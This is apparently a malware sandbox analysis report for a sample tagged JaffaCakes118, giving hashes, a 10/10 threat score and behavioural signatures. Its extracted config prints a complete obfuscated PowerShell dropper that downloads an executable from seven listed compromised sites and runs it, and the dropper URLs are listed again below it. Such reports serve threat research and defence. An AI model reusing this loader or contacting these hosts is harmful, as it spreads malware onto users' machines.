General

  • Target

    eed673967d82297ad7d1a265338a70df_JaffaCakes118

  • Size

    130KB

  • Sample

    240921-b5zdbszbpq

  • MD5

    eed673967d82297ad7d1a265338a70df

  • SHA1

    f3405392dcb05947c2f42a281c5d19572d50b1a9

  • SHA256

    d7123a4f3fae3b4fa986bc7419dd59c1da51e971a9f6a007a637a5da03bf8485

  • SHA512

    c4e7020506ff002afceb1b277da790c681036ac60733dc9f0aab9b1f0973caf95e252d66bb7dc050c7625abce9063c6ce8936f43bd273c94532f4406828c2244

  • SSDEEP

    1536:8KSDRD3bNqfNpu39IId5a6XP3Mg8afCqFANmmGdJxnX3:sR1qf69xak3MgxCCammYrnX3

Score
10/10

Malware Config

Extracted

Language
ps1
Source
$Zi30wqm=('Tz'+('7p'+'d')+'sn');.('n'+'ew'+'-item') $Env:uSERproFIle\j9Myg28\zwvQN08\ -itemtype direcToRy;[Net.ServicePointManager]::"S`E`CUr`ItypRoT`oCol" = (('tl'+'s')+'1'+('2, tls'+'1'+'1')+(', '+'tl')+'s');$Lq4p28v = (('C2'+'z')+('l3h'+'os'));$Fvxhras=(('S'+'pt')+'f'+('wi'+'9'));$Gptvi48=$env:userprofile+(('h'+('bq'+'J')+('9myg2'+'8')+'hb'+('qZ'+'wvqn0')+'8'+('h'+'bq')) -crEplAcE('hb'+'q'),[ChAr]92)+$Lq4p28v+('.e'+'xe');$Y8s7sir=('Y'+('mwj'+'vm4'));$F54aoea=&('n'+'e'+'w-object') net.WebclIENT;$Eybm688=(('http:'+'//'+'h')+('o'+'p'+'eko'+'nnect.com/c')+('gi-'+'b'+'in/'+'v3D')+('D'+'/*h')+('ttp'+':')+('/'+'/c')+('abin'+'e')+('t'+'accura'+'c')+'y'+('.com'+'/wp-inc'+'lu'+'d')+('es'+'/')+'n9'+'0D'+('Bu/*h'+'tt')+'p'+('://ks'+'ulo.c'+'o'+'m/wp-admin/N'+'v')+('ru'+'A')+('/*h'+'ttps'+':/')+('/tra'+'v')+'c'+('all'+'s')+'.c'+('om/blogs/b'+'s'+'lVh')+('/'+'*ht'+'tps:/')+'/'+('raan'+'i'+'va')+('s'+'tra.c'+'o')+('m/wp-co'+'ntent/q/'+'*http:'+'/'+'/2')+'3'+'1b'+'re'+'w'+('in'+'gco')+('.com/'+'w'+'p')+('-in'+'clud'+'es')+('/g'+'w')+'Uy'+('/*'+'htt')+'p'+(':'+'//')+'me'+'a'+('leap'+'ala'+'ce')+('ga'+'te.')+'co'+('m'+'/cg')+('i-b'+'in'+'/G/'))."SPL`iT"([char]42);$Gqo61gj=('J'+('7oc'+'6rs'));foreach($Nzwcje6 in $Eybm688){try{$F54aoea."DoWNLoa`DfI`LE"($Nzwcje6, $Gptvi48);$T14k7wb=(('Co'+'j')+'fo'+'i0');If ((.('Get-'+'I'+'tem') $Gptvi48)."LeN`gtH" -ge 27700) {&('Inv'+'oke-It'+'em')($Gptvi48);$R7g5d84=('V'+'sx'+('6p'+'or'));break;$Ct7ts0x=(('K2'+'l9e')+'kf')}}catch{}}$Zqgwmzy=('Ay'+'ce'+('o'+'fz'))
URLs
exe.dropper

http://hopekonnect.com/cgi-bin/v3DD/

exe.dropper

http://cabinetaccuracy.com/wp-includes/n90DBu/

exe.dropper

http://ksulo.com/wp-admin/NvruA/

exe.dropper

https://travcalls.com/blogs/bslVh/

exe.dropper

https://raanivastra.com/wp-content/q/

exe.dropper

http://231brewingco.com/wp-includes/gwUy/

exe.dropper

http://mealeapalacegate.com/cgi-bin/G/

Targets

    • Target

      eed673967d82297ad7d1a265338a70df_JaffaCakes118

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15
